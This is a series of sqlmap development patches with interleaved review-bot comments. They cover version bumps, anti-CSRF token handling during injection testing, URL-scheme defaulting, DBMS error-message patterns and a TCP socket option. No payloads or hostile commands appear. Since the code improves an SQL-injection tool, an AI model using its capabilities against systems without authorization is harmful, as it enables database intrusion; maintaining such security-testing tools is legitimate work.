@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e0b7d1e6e148bc962df6b59d35910b92 lib/core/settings.py +24f1c46a4530bde2d66a20ae59f745cd lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py d6da5998fea61068a80d9c671db1095f lib/core/target.py @@ -85,7 +85,7 @@ aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py 747f9941a68361bd779ec760f71568e9 lib/takeover/abstraction.py acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py -9b9aa94a1693efa7a9ae0783cfb56896 lib/takeover/metasploit.py +4bf186a747e1a0c4ed5127ef064c3920 lib/takeover/metasploit.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 6a49f359b922df0247eb236126596336 lib/takeover/udf.py a3d07df8a780c668a11f06be42014cdc lib/takeover/web.py From 2e5edce8b9001e8a69ea2b89564dda9ce39b5ec4 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Dec 2018 15:22:53 +0100 Subject: [PATCH 385/428] Fixes #3399 --- lib/controller/controller.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index bc071cbdbb7..864ea91c9cc 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -505,7 +505,7 @@ def start(): infoMsg = "skipping %s parameter '%s'" % (paramType, parameter) logger.info(infoMsg) - elif re.search(conf.csrfToken, parameter, re.I): + elif conf.csrfToken and re.search(conf.csrfToken, parameter, re.I): testSqlInj = False infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter diff --git a/lib/core/settings.py b/lib/core/settings.py index 54682d6e5be..3b14bfa9664 100644 --- a/lib/core/settings.py 
+++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.12" +VERSION = "1.2.12.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 791a7ad672a..b080815524f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 0f0feede9750be810d2b8a7ab159b7b0 lib/controller/checks.py -93f7eabf92f3da3d96cbd8266e30414d lib/controller/controller.py +ad968ee04e93f6f850d6b7e5ac0073c5 lib/controller/controller.py 988b548f6578adf9cec17afdeee8291c lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e62309b22a59e60b270e62586f169441 lib/core/agent.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -24f1c46a4530bde2d66a20ae59f745cd lib/core/settings.py +e2d4507e4cb26ae64f94d17772f67d8d lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py d6da5998fea61068a80d9c671db1095f lib/core/target.py From 38684ec22098abca7c8b0f178e2306895aee3858 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 11 Dec 2018 13:28:51 +0100 Subject: [PATCH 386/428] Fixes #3403 --- lib/core/settings.py | 2 +- lib/core/target.py | 5 ++++- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 4 deletions(-) 
diff --git a/lib/core/settings.py b/lib/core/settings.py index 3b14bfa9664..0754e42e6fe 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.13" +VERSION = "1.2.12.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index 1b8232a3227..3d99d10e169 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -408,7 +408,10 @@ def process(match, repl): message += "Do you want sqlmap to automatically update it in further requests? [y/N] " if readInput(message, default='N', boolean=True): - conf.csrfToken = getUnicode(parameter) + class _(unicode): + pass + conf.csrfToken = _(re.escape(getUnicode(parameter))) + conf.csrfToken._original = getUnicode(parameter) break def _setHashDB(): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b080815524f..aa6ea1a8bfc 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,10 +49,10 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e2d4507e4cb26ae64f94d17772f67d8d lib/core/settings.py +0c0d9162f3ec64208c203e7b7e7aaf01 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -d6da5998fea61068a80d9c671db1095f lib/core/target.py +1581be48127a3a7a9fd703359b6e7567 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py cd0067d1798e45f422ce44b98baf57db lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py 
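Review bot: The `class _(unicode): pass` wrapper with `._original` now appears both here and in `_cleanupOptions` (option.py, earlier on this page), and the two sites differ in that this one always escapes while the other may keep a user regex; one helper, e.g. `_csrfTokenPattern(literal, pattern)`, would stop them drifting. Failing that, a one-line comment at this site, `# name chosen interactively: store an escaped pattern, keep the literal for messages`, would explain the asymmetry to a reader of target.py alone. The enclosing function starts outside the hunk.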
From 83a1b9b2e7bfdfbec8652cf62258ca5c871ee000 Mon Sep 17 00:00:00 2001 From: nil0x42 Date: Fri, 14 Dec 2018 07:08:52 -0200 Subject: [PATCH 387/428] errors.xml: detect mysqli_*() errors. (#3407) MySQL injection error message often happen with mysqli_*() functions nowadays. POC: https://duckduckgo.com/?q=%22warning..mysqli --- xml/errors.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/xml/errors.xml b/xml/errors.xml index 02e529e7f66..60ec971af98 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -4,7 +4,7 @@ - + From d1426a023fb23d8247d5c489d7fa441145925abc Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 14 Dec 2018 10:09:40 +0100 Subject: [PATCH 388/428] Fixes #3408 --- lib/core/settings.py | 2 +- lib/request/connect.py | 5 +++-- txt/checksum.md5 | 6 +++--- 3 files changed, 7 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 0754e42e6fe..54cb90a4d97 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.14" +VERSION = "1.2.12.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 37ec0fc1e3c..8dfe9438357 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py 
@@ -994,9 +994,10 @@ def _adjustParameter(paramString, parameter, newValue): token.value = "".join(chr(int(_)) for _ in match.group(1).replace(' ', "").split(',')) if not token: - if conf.csrfUrl != conf.url and code == httplib.OK: + if conf.csrfUrl and conf.csrfToken and conf.csrfUrl != conf.url and code == httplib.OK: if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""): - token = page + token.name = conf.csrfToken + token.value = page if not token and conf.cj and any(re.search(conf.csrfToken, _.name, re.I) for _ in conf.cj): for _ in conf.cj: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index aa6ea1a8bfc..17ac233f30a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0c0d9162f3ec64208c203e7b7e7aaf01 lib/core/settings.py +622797ad77a9cff4effe49b046170d50 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -9eb0cc48e7e4779e44f1641aa7d39a4d lib/request/connect.py +40c4cc791ec657b612ccecf5b3241651 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py 
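Review bot: `token.name = conf.csrfToken` in the `text/plain` branch stores the regex form of the token, so when it is later appended as `"%s=%s" % (token.name, token.value)` the request carries an escaped pattern (e.g. `csrf\_token`) rather than the parameter name; the other discovery paths put the actually matched name in `token.name`, and the error message already uses `conf.csrfToken._original`, so `token.name = conf.csrfToken._original` is the consistent choice (assuming every assignment to `conf.csrfToken` goes through the wrappers added on this page). The added `conf.csrfToken and` test is redundant inside the enclosing `if conf.csrfToken:` block, which begins outside the hunk.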
@@ -478,7 +478,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml ccb5e02a692f75d11b7fd00f1db48bf5 xml/banner/x-powered-by.xml 385570003bf7d84f2502191eae8268c6 xml/boundaries.xml -e7c893dd4f3f1d6b5b6f5ffd717d38cc xml/errors.xml +78de3436ae5ad4b3882d59079f2012e4 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 11547289b99eaced5b55185a3230529a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml From c7c7e301302d09722784a1e1a4ffad9b128bf91a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 14 Dec 2018 10:45:42 +0100 Subject: [PATCH 389/428] Potential patch for #3374 --- lib/core/settings.py | 2 +- sqlmap.py | 6 ------ txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 9 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 54cb90a4d97..f0bf6fdfee8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.15" +VERSION = "1.2.12.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index fb126c7ae6a..d0f4093ff7d 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -194,12 +194,6 @@ def main(): except KeyboardInterrupt: print - errMsg = "user aborted" - try: - logger.critical(errMsg) - except KeyboardInterrupt: - pass - except EOFError: print errMsg = "exit" diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 17ac233f30a..c8189fc52f4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
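Review bot: Dropping `logger.critical(errMsg)` from the `except KeyboardInterrupt:` branch in `main()` apparently leaves a Ctrl-C caught at this point without any log line saying the run was aborted; if the intent is to avoid a second interrupt landing inside the logger call, a comment on the `except KeyboardInterrupt:` line, `# no logging here: a second Ctrl-C during logger.critical() would escape the handler`, records the reason for the next reader (the surrounding handling is rewritten in the 'Refactoring KeyboardInterrupt mess' commit below). `main()` begins outside the hunk.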
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -622797ad77a9cff4effe49b046170d50 lib/core/settings.py +0070ff829f953549bd7a8a65090fa09d lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -234,7 +234,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -fa713ca1dc1983f3cb3d90e76a05819a sqlmap.py +55ba3999ab8819e0d34ca075d46fa9dd sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py From f5445544758426b2568c6dbc914823f1fb5d2acd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 16 Dec 2018 02:56:31 +0100 Subject: [PATCH 390/428] Bug fix (--forms with --url without protocol) --- lib/core/common.py | 7 ++++++- lib/core/option.py | 2 ++ lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 12 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 8c103814ffb..669288576ca 100644 --- a/lib/core/common.py +++ b/lib/core/common.py 
@@ -4116,7 +4116,12 @@ def checkSameHost(*urls): elif len(urls) == 1: return True else: - return all(re.sub(r"(?i)\Awww\.", "", urlparse.urlparse(url or "").netloc.split(':')[0]) == re.sub(r"(?i)\Awww\.", "", urlparse.urlparse(urls[0] or "").netloc.split(':')[0]) for url in urls[1:]) + def _(value): + if value and not re.search(r"\A\w+://", value): + value = "http://%s" % value + return value + + return all(re.sub(r"(?i)\Awww\.", "", urlparse.urlparse(_(url) or "").netloc.split(':')[0]) == re.sub(r"(?i)\Awww\.", "", urlparse.urlparse(_(urls[0]) or "").netloc.split(':')[0]) for url in urls[1:]) def getHostHeader(url): """ diff --git a/lib/core/option.py b/lib/core/option.py index 85acb8a322f..bd8920f8d03 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1511,6 +1511,8 @@ def _cleanupOptions(): if conf.url: conf.url = conf.url.strip() + if not re.search(r"\A\w+://", conf.url): + conf.url = "http://%s" % conf.url if conf.fileRead: conf.fileRead = ntToPosixSlashes(normalizePath(conf.fileRead)) diff --git a/lib/core/settings.py b/lib/core/settings.py index f0bf6fdfee8..8422c691fc6 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.16" +VERSION = "1.2.12.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c8189fc52f4..9dac3d66465 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
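Review bot: `checkSameHost` and `_cleanupOptions` now each add a default scheme with the same `re.search(r"\A\w+://", ...)` test and `"http://%s"` prefix; one shared helper in lib/core/common.py would keep the two copies from drifting, and the inner function should not be named `_`, which elsewhere on this page is the throwaway name for loop variables. The defaulting is also silent: a target given without a scheme is sent over plaintext HTTP, so a `logger.debug` line in the option.py branch noting that `http://` was assumed would make that visible in the run output. Both enclosing functions start outside their hunks.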
@@ -29,7 +29,7 @@ ad968ee04e93f6f850d6b7e5ac0073c5 lib/controller/controller.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e62309b22a59e60b270e62586f169441 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -cf84ff84891b7f51620a457b0bff28c5 lib/core/common.py +a78c563bbaeebd958b25303d83dfe3f2 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -42,14 +42,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -ecf9879967182e6402f3cab6840f5b75 lib/core/option.py +b3ffa34552b4594bbba54513069c642b lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0070ff829f953549bd7a8a65090fa09d lib/core/settings.py +380daa313fda2c14c88b69c3461f0e54 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From c224ea0e377a6b54da7344b34720d3d4137ae87d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 16 Dec 2018 15:20:46 +0100 Subject: [PATCH 391/428] Update of DBMS error messages --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/errors.xml | 13 ++++++++++++- 3 files changed, 15 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 8422c691fc6..e3e8e808d5b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.17" +VERSION = "1.2.12.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9dac3d66465..6754fa418e5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -380daa313fda2c14c88b69c3461f0e54 lib/core/settings.py +52a928e8548d5a45bf1a606ffd59fe1b lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -478,7 +478,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml ccb5e02a692f75d11b7fd00f1db48bf5 xml/banner/x-powered-by.xml 385570003bf7d84f2502191eae8268c6 xml/boundaries.xml -78de3436ae5ad4b3882d59079f2012e4 xml/errors.xml +a4130c4e7abfbcb1aaf66386825b6b83 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 11547289b99eaced5b55185a3230529a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml diff --git a/xml/errors.xml b/xml/errors.xml index 60ec971af98..3604395e92f 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -11,8 +11,9 @@ - + + @@ -27,6 +28,7 @@ + @@ -46,7 +48,9 @@ + + @@ -69,6 +73,8 @@ + + @@ -78,6 +84,8 @@ + + @@ -87,6 +95,7 @@ + @@ -94,6 +103,7 @@ + @@ -108,6 +118,7 @@ + From eedfa8c888748b529f313ab99a5e3db18860180b Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Sun, 16 Dec 2018 16:00:04 +0100 Subject: [PATCH 392/428] Another update of DBMS error messages --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/errors.xml | 21 ++++++++++----------- 3 files changed, 13 insertions(+), 14 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e3e8e808d5b..ee8c4f325dc 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.18" +VERSION = "1.2.12.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 6754fa418e5..f3c919777a7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -52a928e8548d5a45bf1a606ffd59fe1b lib/core/settings.py +9afc3256156efa516bab3cdaa515d70b lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -478,7 +478,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml ccb5e02a692f75d11b7fd00f1db48bf5 xml/banner/x-powered-by.xml 385570003bf7d84f2502191eae8268c6 xml/boundaries.xml -a4130c4e7abfbcb1aaf66386825b6b83 xml/errors.xml +054874dd9797c22b1de142bf4cbf7f54 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 11547289b99eaced5b55185a3230529a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml 
diff --git a/xml/errors.xml b/xml/errors.xml index 3604395e92f..68f4937fe31 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -4,7 +4,7 @@ - + @@ -36,10 +36,10 @@ - + - + @@ -67,8 +67,7 @@ - - + @@ -90,6 +89,7 @@ + @@ -101,7 +101,7 @@ - + @@ -111,8 +111,7 @@ - - + @@ -124,14 +123,14 @@ - + - + @@ -140,7 +139,7 @@ - + From 4ba9e9397c3a82d352d8eb7f2cec73ee9cace19f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 16 Dec 2018 16:24:01 +0100 Subject: [PATCH 393/428] One more update of DBMS error messages --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/errors.xml | 10 ++++++++-- 3 files changed, 11 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index ee8c4f325dc..0e510894080 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.19" +VERSION = "1.2.12.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f3c919777a7..3f4a25c92b9 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9afc3256156efa516bab3cdaa515d70b lib/core/settings.py +7983dceb638a5ba80b33209140bb8531 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py 
@@ -478,7 +478,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml ccb5e02a692f75d11b7fd00f1db48bf5 xml/banner/x-powered-by.xml 385570003bf7d84f2502191eae8268c6 xml/boundaries.xml -054874dd9797c22b1de142bf4cbf7f54 xml/errors.xml +4df7176815d874cf99649201caf10642 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 11547289b99eaced5b55185a3230529a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml diff --git a/xml/errors.xml b/xml/errors.xml index 68f4937fe31..b8c8165dca1 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -5,7 +5,6 @@ - @@ -14,6 +13,7 @@ + @@ -29,6 +29,7 @@ + @@ -46,11 +47,11 @@ - + @@ -74,6 +75,7 @@ + @@ -85,6 +87,7 @@ + @@ -96,6 +99,7 @@ + @@ -118,6 +122,7 @@ + @@ -134,6 +139,7 @@ + From c497aa98ed71a8d39da92ba69f0f473d754ecf56 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 14:19:59 +0100 Subject: [PATCH 394/428] Minor TCP optimization --- lib/core/option.py | 6 ++++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 3 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index bd8920f8d03..13e17fdf8e7 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -893,6 +893,12 @@ def _thread(): family, type, proto, address = key s = socket.socket(family, type, proto) s._connect(address) + try: + if type == socket.SOCK_STREAM: + # Reference: https://www.techrepublic.com/article/tcp-ip-options-for-high-performance-data-transmission/ + s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + except: + pass with kb.locks.socket: socket._ready[key].append((s._sock, time.time())) except KeyboardInterrupt: diff --git a/lib/core/settings.py b/lib/core/settings.py index 0e510894080..38ee40015a4 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
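Review bot: The bare `except: pass` around the new `setsockopt` call in `_thread` also swallows KeyboardInterrupt and SystemExit, which is at odds with the explicit `except KeyboardInterrupt:` handler a few lines below this hunk; narrow it to `except socket.error: pass`, which should cover what `setsockopt` can raise on a freshly created socket. A short why-comment on the option would also help, e.g. `# disable Nagle's algorithm so small request writes are not delayed`. The local `type` shadows the builtin in the context lines, but that predates this change. `_thread` begins outside this hunk.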
